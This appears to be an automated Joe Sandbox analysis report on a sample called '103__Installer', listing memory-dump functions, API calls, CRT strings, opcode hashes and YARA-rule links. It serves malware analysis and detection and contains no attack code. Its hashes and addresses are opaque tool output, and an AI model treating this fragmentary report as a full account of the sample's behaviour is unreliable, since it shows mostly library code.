Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: H_prolog$IncrefLockitLockit::_std::_std::locale::facet::_
String ID:
API String ID: 3551698239-0
Opcode ID: cf3937dd2f74a696d023d37563e54d9aad385ef2ac624f273b243c5955c524a5
Instruction ID: a68516f1f8d87c789ad9a621caeffc890832cdf7b73a6219c414986ccb92473a
Opcode Fuzzy Hash: cf3937dd2f74a696d023d37563e54d9aad385ef2ac624f273b243c5955c524a5
Instruction Fuzzy Hash: EFF06D72A00155AFCB16EB6CCC01BAE73EAEF14701F00C8A9F52D96291DBB48A548764

Function 03B0D5FC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3334693834.0000000003B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0d000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59a5686582cf2bc33a853071bb4db87042622a099beeaa129ee6623528d121b2
Instruction ID: 144153ff4cfac122a34701f60e9b8540855c74c945eb248f6edd6d7fd30c2e8d
Opcode Fuzzy Hash: 59a5686582cf2bc33a853071bb4db87042622a099beeaa129ee6623528d121b2
Instruction Fuzzy Hash: F421F475504244DFDB05EF94D980B2ABF65FB98228F2885FDE8090B296C336D456CAA1

Function 03B0D5F7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3334693834.0000000003B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0d000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99fa90ddb4ee017fdfc056b7864a7805b5309b7a0d48323febe676dea14afe97
Instruction ID: 4dbe3ea831038bee2abe3839dfeafbd31e00a871ab61ad201b21cd76d222a15a
Opcode Fuzzy Hash: 99fa90ddb4ee017fdfc056b7864a7805b5309b7a0d48323febe676dea14afe97
Instruction Fuzzy Hash: DF11DF76504240CFCB02DF50D5C4B1ABF62FB84324F2886EDD8480B696C33AD456CBA1

Function 03B0D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3334693834.0000000003B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0d000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f22d20b4a4626a15088925dfb25192aa63acb6953c3c107ed76603d904f2c0e
Instruction ID: bb5b91ecd2b898bb010d5739987eec4744ad04598deaf23f132f4b26b84b8380
Opcode Fuzzy Hash: 8f22d20b4a4626a15088925dfb25192aa63acb6953c3c107ed76603d904f2c0e
Instruction Fuzzy Hash: A501296240D3809FE7128A258994752BFA8EF53224F1984EBE9888F1E7D2685845CB72

Function 03B0D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3334693834.0000000003B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0d000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b2d46f495cc0ef0e62ff04a93826a7c4d34bb4b1c9ab473513ae830223b22ee
Instruction ID: c6957d0b602e8091af79ba6da0c62e54bbb08266635decba1c2a85e69065d8e5
Opcode Fuzzy Hash: 3b2d46f495cc0ef0e62ff04a93826a7c4d34bb4b1c9ab473513ae830223b22ee
Instruction Fuzzy Hash: 9D01D4715043409FE7208E61CA84B66BF98EF42228F18C4AEED4D0A1C2D2799441CAB2

Non-executed Functions

Function 00B7F45D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00B7FA9A,?,00B76AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00B7F49C
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00B7FA9A,?,00B76AFC,?,000000BC,?,00000001,00000000,00000000), ref: 00B7F4C5
GetACP.KERNEL32(?,?,00B7FA9A,?,00B76AFC,?,000000BC,?,00000001,00000000), ref: 00B7F4D9

Strings

OCP, xrefs: 00B7F47D
ACP, xrefs: 00B7F46C

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: d98ffac3b6b1cf094b053198ebff3fd6a157de6aa444afd0f41efd6f74d8a148
Instruction ID: 7e6b8c6f193574527e94903420968582ba9a002d1a8ae70f0c0176df764bf762
Opcode Fuzzy Hash: d98ffac3b6b1cf094b053198ebff3fd6a157de6aa444afd0f41efd6f74d8a148
Instruction Fuzzy Hash: 0601D831505607BBEB11AB65DC0AF7B76E8EF01368F10C4A4F515E12E1EB64CA41D758

Function 00B765D1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00B7DF93
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B7DFA8
UnhandledExceptionFilter.KERNEL32(00B8AEE0), ref: 00B7DFB3
GetCurrentProcess.KERNEL32(C0000409), ref: 00B7DFCF
TerminateProcess.KERNEL32(00000000), ref: 00B7DFD6

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: cf9f8d8b51390d3cf2721328cf964c1a08eaff8ece577f8731fa6e4cad90d884
Instruction ID: a824af287ffcc203a1e87dd3718aaf0f3b694ba77784aa1cb793b1cfcac4c13e
Opcode Fuzzy Hash: cf9f8d8b51390d3cf2721328cf964c1a08eaff8ece577f8731fa6e4cad90d884
Instruction Fuzzy Hash: 2721BEB8809306EBD701EF69EA846543BF5BB08740F50499BE81987A70EBB05980EF19

Function 00B7C71D Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000C6DB), ref: 00B7C722

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0d30ba9cd245acc082909c70823caeb5622b3de5a65fc996064d28dc36ace64c
Instruction ID: 88d5b3e7f4e67da3138ace570adb3297d2e1a7473ba355977e67e3f63dbc15ae
Opcode Fuzzy Hash: 0d30ba9cd245acc082909c70823caeb5622b3de5a65fc996064d28dc36ace64c
Instruction Fuzzy Hash: 4D9002B0291100974F0017705E4951639D25B9860274654986515DA078DE908100BA52

Function 05F849C0 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\V^m, xrefs: 05F84C0B

Memory Dump Source

Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd

Similarity

API ID:
String ID: \V^m
API String ID: 0-3751104571
Opcode ID: 2a1f0c7fc2a5c6a2cb1da4094c7960a3a8ddc8b3141386659d79204416fd39e7
Instruction ID: 4d94fd0e31dace8fcda59fa49d89c518986441d6cb6f6236233936bdf41c7e2e
Opcode Fuzzy Hash: 2a1f0c7fc2a5c6a2cb1da4094c7960a3a8ddc8b3141386659d79204416fd39e7
Instruction Fuzzy Hash: A4918370E0030ADFDF14EFA8C9887ADBBF2BF88718F148129D415AB254EB789841CB45

Function 00B80B66 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 4908733bfad6decfb778ae413d466b55ebe478b39a787b7431e44d23bb20ca9a
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: 1AC18E33D2A4F24987B5652D446823BEEE2AF91B8531B83D1DCD43F1AAC2276D09D7D0

Function 00B8077E Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: 6414cba3721f834412edb9613fe7bbb7c5efc5508a1e40bcaf17dd565a2a31a2
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: B9C17F33D2A5F24987B5652D446823AEAE2AF91B8431B83D1CCD43F1AAC2276D09D7D0

Function 00B803AC Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: a06c210bd2970b54b1d42556341d269f8f35a04b6505fb078bb7667da8359fb7
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: 84C19133E2A5F24587B1652D446822BEEE1AF91B8431F83D1CCD43F2AAC2276D09D7D0

Function 00B8000E Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: e35ef2d3204d4d086d4b18073aa17a6035ab259492a2820ff1c30a74f5e25a87
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 63B1A233D2A4B24A87B1652D445823BEEE2AF91B8431AC3D0DCD03F5AAC6276D09D7D0

Function 05F807A0 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3335700396.0000000005F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5f80000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b9444ab32ab44173bc28f89c1bcb6f151d55dabd4adb79558f956905022f97
Instruction ID: 59b081cc533a9284a8e36908d1290753d67e1e3a6a2960e6022caa105b39602c
Opcode Fuzzy Hash: 44b9444ab32ab44173bc28f89c1bcb6f151d55dabd4adb79558f956905022f97
Instruction Fuzzy Hash: B9818035F012188BDB18EBB5886877E7BBBBFC8310B44856DD406E7388DE399C068791

Function 03AC1628 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3334563354.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ab0000_103__Installer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction ID: b3007c8cad634d2501572a08fee54b5b55c66b3f8babe63c40c8773931025736
Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction Fuzzy Hash: 29F0C936320245AFDF15DF59D841DAA77E9EF08664B49406EFD09DB222E235ED209B80

Function 00B71671 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644

Function 00B798E5 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00B75A5E), ref: 00B798ED
__mtterm.LIBCMT ref: 00B798F9

Part of subcall function 00B79632: DecodePointer.KERNEL32(00000002,00B79A5B,?,00B75A5E), ref: 00B79643
Part of subcall function 00B79632: TlsFree.KERNEL32(00000002,00B79A5B,?,00B75A5E), ref: 00B7965D
Part of subcall function 00B79632: DeleteCriticalSection.KERNEL32(00000000,00000000,77665810,?,00B79A5B,?,00B75A5E), ref: 00B7B634
Part of subcall function 00B79632: _free.LIBCMT ref: 00B7B637
Part of subcall function 00B79632: DeleteCriticalSection.KERNEL32(00000002,77665810,?,00B79A5B,?,00B75A5E), ref: 00B7B65E

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00B7990F
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00B7991C
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00B79929
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00B79936
TlsAlloc.KERNEL32(?,00B75A5E), ref: 00B79986
TlsSetValue.KERNEL32(00000000,?,00B75A5E), ref: 00B799A1
__init_pointers.LIBCMT ref: 00B799AB
EncodePointer.KERNEL32(?,00B75A5E), ref: 00B799BC
EncodePointer.KERNEL32(?,00B75A5E), ref: 00B799C9
EncodePointer.KERNEL32(?,00B75A5E), ref: 00B799D6
EncodePointer.KERNEL32(?,00B75A5E), ref: 00B799E3
DecodePointer.KERNEL32(00B797B6,?,00B75A5E), ref: 00B79A04
__calloc_crt.LIBCMT ref: 00B79A19
DecodePointer.KERNEL32(00000000,?,00B75A5E), ref: 00B79A33
GetCurrentThreadId.KERNEL32 ref: 00B79A45

Strings

FlsGetValue, xrefs: 00B79911
FlsAlloc, xrefs: 00B79909
KERNEL32.DLL, xrefs: 00B798E8
FlsFree, xrefs: 00B7992B
FlsSetValue, xrefs: 00B7991E

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: e5c9b7f64ced4e7013be8ab3000ddf36b5ae5571ab2a980ba229ad49fa850424
Instruction ID: f64d2e973840ec281ace04335845fadab69cfbb34095fb411239f768e2253a4e
Opcode Fuzzy Hash: e5c9b7f64ced4e7013be8ab3000ddf36b5ae5571ab2a980ba229ad49fa850424
Instruction Fuzzy Hash: 933172719123119EEB20BF79AE0AA6E3FE4EB94360B14456BE52CD71B1DF748840CF50

Function 00B72344 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B72349
std::_Lockit::_Lockit.LIBCPMT ref: 00B72358
int.LIBCPMT ref: 00B7236F

Part of subcall function 00B71035: std::_Lockit::_Lockit.LIBCPMT ref: 00B71046

__CxxThrowException@8.LIBCMT ref: 00B723B4
std::locale::facet::_Incref.LIBCPMT ref: 00B723C4
std::locale::facet::_Facet_Register.LIBCPMT ref: 00B723CA

Strings

bad cast, xrefs: 00B7239E

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrow
String ID: bad cast
API String ID: 262090721-3145022300
Opcode ID: 52ae3253b3b3e85c1f83079987306cb7ac4673f00d2f1de55eaaf3d1f76cdfed
Instruction ID: bdac8e1a45411172aa0ecd6f139eadd13fbb11b1e296ae6c94f6b54d6dc44099
Opcode Fuzzy Hash: 52ae3253b3b3e85c1f83079987306cb7ac4673f00d2f1de55eaaf3d1f76cdfed
Instruction Fuzzy Hash: 28110632A001049BCF05FB68CC42AAEB3F4EB80B20F108599F835B71D1CF349A01D7A4

Function 00B71E13 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B71E18
std::_Lockit::_Lockit.LIBCPMT ref: 00B71E27
int.LIBCPMT ref: 00B71E3E

Part of subcall function 00B71035: std::_Lockit::_Lockit.LIBCPMT ref: 00B71046

__CxxThrowException@8.LIBCMT ref: 00B71E83
std::locale::facet::_Incref.LIBCPMT ref: 00B71E93
std::locale::facet::_Facet_Register.LIBCPMT ref: 00B71E99

Strings

bad cast, xrefs: 00B71E6D

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrow
String ID: bad cast
API String ID: 262090721-3145022300
Opcode ID: dc109811e9ef081c1ae75abbcb628e2b2426cb037ea7e063b548b54dcdc520eb
Instruction ID: acc0c614c661584bc947f9476b401dbcb5c03e208a2cc492e181bac19109c2ff
Opcode Fuzzy Hash: dc109811e9ef081c1ae75abbcb628e2b2426cb037ea7e063b548b54dcdc520eb
Instruction Fuzzy Hash: C4118F32A001149BCF05FB68CD42AAEB7F5EB80B21F508599E43977191DB309A019760

Function 00B75C52 Relevance: 12.1, APIs: 8, Instructions: 147COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?), ref: 00B75CED
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?), ref: 00B75D26
__freea.LIBCMT ref: 00B75DBE

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: String$__freea
String ID:
API String ID: 172395558-0
Opcode ID: 39dceeac52555e0b3d2ac6dd6e7b6aa8f9f2bcff5eae0eacd7a481381b96fc74
Instruction ID: 84d06a840f4648bcbba3108e0850842a009a69650ea3faa7f3ddc994d6fd7ac7
Opcode Fuzzy Hash: 39dceeac52555e0b3d2ac6dd6e7b6aa8f9f2bcff5eae0eacd7a481381b96fc74
Instruction Fuzzy Hash: E341807290090ABFDF325FA0CC85DAE7BF6EB44350B1485B9F679A2120DB718D61DB50

Function 00B77413 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 00B7741A

Part of subcall function 00B79723: GetLastError.KERNEL32(?,?,00B7A8F0,00B74478,?,?,00B73C60,?,?,00B7101C), ref: 00B79727
Part of subcall function 00B79723: ___set_flsgetvalue.LIBCMT ref: 00B79735
Part of subcall function 00B79723: __calloc_crt.LIBCMT ref: 00B79749
Part of subcall function 00B79723: DecodePointer.KERNEL32(00000000,?,?,00B7A8F0,00B74478,?,?,00B73C60,?,?,00B7101C), ref: 00B79763
Part of subcall function 00B79723: GetCurrentThreadId.KERNEL32 ref: 00B79779
Part of subcall function 00B79723: SetLastError.KERNEL32(00000000,?,?,00B7A8F0,00B74478,?,?,00B73C60,?,?,00B7101C), ref: 00B79791

__calloc_crt.LIBCMT ref: 00B7743C
__get_sys_err_msg.LIBCMT ref: 00B7745A
_strcpy_s.LIBCMT ref: 00B77462
__invoke_watson.LIBCMT ref: 00B77477

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00B77427, 00B7744A

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 204be13a93052108983dbff74d8aa8fb9e33ef56634dcabd611a731fda43a3cc
Instruction ID: c1e91eb1a16fcd87ac6129f22a5a319cb5c288f5b9088cf785d2dbea91a41d75
Opcode Fuzzy Hash: 204be13a93052108983dbff74d8aa8fb9e33ef56634dcabd611a731fda43a3cc
Instruction Fuzzy Hash: 77F0247264C2102BDB2039295C819AB7ADCCB80B24F25C4FAF67D97201ED21AC0192A9

Function 00B71A66 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B71A6B
std::_Lockit::_Lockit.LIBCPMT ref: 00B71A7D
std::exception::exception.LIBCMT ref: 00B71AB4

Part of subcall function 00B73C6B: std::exception::_Copy_str.LIBCMT ref: 00B73C86

__CxxThrowException@8.LIBCMT ref: 00B71AC9

Part of subcall function 00B7450C: RaiseException.KERNEL32(?,?,00B713AC,?,?,?,?,?,00B713AC,?,00B8CCD8,00000000), ref: 00B7454E

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B71AD2

Strings

bad locale name, xrefs: 00B71AAD

Memory Dump Source

Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd

Similarity

